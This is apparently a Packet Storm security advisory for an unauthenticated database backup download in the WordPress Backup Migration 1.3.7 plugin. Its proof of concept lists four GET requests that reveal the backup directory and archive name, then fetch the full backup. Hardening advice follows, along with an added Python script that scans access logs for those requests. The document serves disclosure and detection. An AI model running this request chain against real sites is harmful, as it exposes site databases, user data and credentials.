📄 WordPress Backup Migration 1.3.7 Database Disclosure

Published: 02 Mar 2026. Reported by: indoushka. Type: packetstorm. Source: packetstorm.news. 148 views.

Unauthenticated access in WordPress Backup Migration 1.3.7 exposes backups and sensitive data.

Code
    =============================================================================================================================================
    | # Title     : WordPress Plugin Backup Migration 1.3.7 Unauthenticated Database Backup                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/backup-backup/                                                                                |
    =============================================================================================================================================
    
    POC : 
    
    Description:
    The Backup Migration WordPress plugin (version 1.3.7) allows unauthenticated users to access sensitive backup files, 
    potentially exposing the full database and website content. An attacker can retrieve backup archives without authentication.
    
    Impact:
    An attacker can:
    - Download full database backups.
    - Access sensitive configuration and user data.
    - Potentially compromise the entire WordPress installation.
    
    Technical Details / Proof of Concept (PoC):
    
    1) Get the version of the plugin:
    GET /wp-content/plugins/backup-backup/readme.txt
    Response:
    --------------------------------------------------------------------------
    Stable tag: 1.3.7
    --------------------------------------------------------------------------
    
    2) Get the name of the backup directory:
    GET /wp-content/backup-migration/config.json
    Response:
    --------------------------------------------------------------------------
    {
      [...],
      "STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
      [...],
      "OTHER:EMAIL":"[email protected]"
    }
    --------------------------------------------------------------------------
    
    3) Get the name of the archive containing the backups:
    GET /wp-content/backup-migration/complete_logs.log
    Response:
    --------------------------------------------------------------------------
    BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
    --------------------------------------------------------------------------
    
    4) Build the path for the download:
    GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
    
    Recommendation:
    - Restrict access to backup directories via .htaccess or web server configuration.
    - Do not store backups in publicly accessible paths.
    - Apply authentication checks before serving backup files.
    - Update the plugin if a secure version is released by the vendor.
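The four requests in the PoC leave a distinctive trail in ordinary web-server access logs, and the recommended .htaccess or server-level block turns that trail from HTTP 200 into 403. The following is an added example, not part of the advisory and not code from the plugin or its vendor: it parses combined-format access-log lines, matches the paths the advisory lists (the storage directory suffix is random per site, so the archive rule accepts any `backup-migration-<suffix>/backups/*.zip`, which is an assumption drawn from the PoC), and rates each client by how far down the chain it got and whether the server actually served the files. The sample log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample lines in the Apache/nginx "combined" log format; they are
# not from the advisory. 203.0.113.7 walks the full four-request chain, the
# second client is refused (403) at the config.json step, the third is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Mar/2026:10:14:01 +0000] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 200 1524 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2026:10:14:03 +0000] "GET /wp-content/backup-migration/config.json HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2026:10:14:05 +0000] "GET /wp-content/backup-migration/complete_logs.log HTTP/1.1" 200 9931 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2026:10:14:09 +0000] "GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_2026-03-01_00_00_00_xXxXxxXxXxxXxXxx.zip HTTP/1.1" 200 48213377 "-" "Mozilla/5.0"
198.51.100.4 - - [02/Mar/2026:10:20:11 +0000] "GET /wp-content/backup-migration/config.json?x=1 HTTP/1.1" 403 199 "-" "curl/8.4.0"
192.0.2.9 - - [02/Mar/2026:10:21:30 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD path proto", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths from the advisory's four-step chain, as regexes over the URL path
# (query string removed). The storage directory suffix is random per site
# (assumption based on the PoC), so the archive rule matches any
# backup-migration-<suffix>/backups/BM_Backup_*.zip.
INDICATORS = {
    "plugin_readme":  re.compile(r"^/wp-content/plugins/backup-backup/readme\.txt$", re.I),
    "config_json":    re.compile(r"^/wp-content/backup-migration/config\.json$", re.I),
    "complete_logs":  re.compile(r"^/wp-content/backup-migration/complete_logs\.log$", re.I),
    "backup_archive": re.compile(r"^/wp-content/backup-migration-[^/]+/backups/BM_Backup_[^/]+\.zip$", re.I),
}


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Map a request path to an indicator name from the advisory chain, or None."""
    path = path.split("?", 1)[0]  # ignore query strings such as cache-busters
    for name, rx in INDICATORS.items():
        if rx.match(path):
            return name
    return None


def analyze(lines):
    """Group indicator hits per client IP and rate them.

    critical: a backup archive was served (HTTP 200) -> treat as data exposure
    high:     config.json or complete_logs.log was served -> archive path is now known
    low:      only the public readme was read, or every indicator request was refused
    """
    per_ip = defaultdict(lambda: {"served": set(), "blocked": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tag = classify(rec["path"])
        if tag is None:
            continue
        bucket = "served" if rec["status"] == 200 else "blocked"
        per_ip[rec["ip"]][bucket].add(tag)

    findings = {}
    for ip, hits in per_ip.items():
        if "backup_archive" in hits["served"]:
            severity = "critical"
        elif hits["served"] & {"config_json", "complete_logs"}:
            severity = "high"
        else:
            severity = "low"
        findings[ip] = {
            "severity": severity,
            "served": sorted(hits["served"]),
            "blocked": sorted(hits["blocked"]),
        }
    return findings


if __name__ == "__main__":
    for ip, f in analyze(SAMPLE_LOG.splitlines()).items():
        print(f"{ip:15} {f['severity']:8} served={f['served']} blocked={f['blocked']}")
```

Run it over the site's access log (for example `analyze(open("/var/log/nginx/access.log"))`) to find clients that reached the archive before the directory was locked down; a `critical` finding means a backup left the server and the credentials inside it should be rotated. After the recommended web-server deny rule is in place, the same probes show up in the `blocked` set with a non-200 status, so the script also serves as a quick check that the block is working. The path layout is taken from the advisory for version 1.3.7 and may differ in other plugin versions.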
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
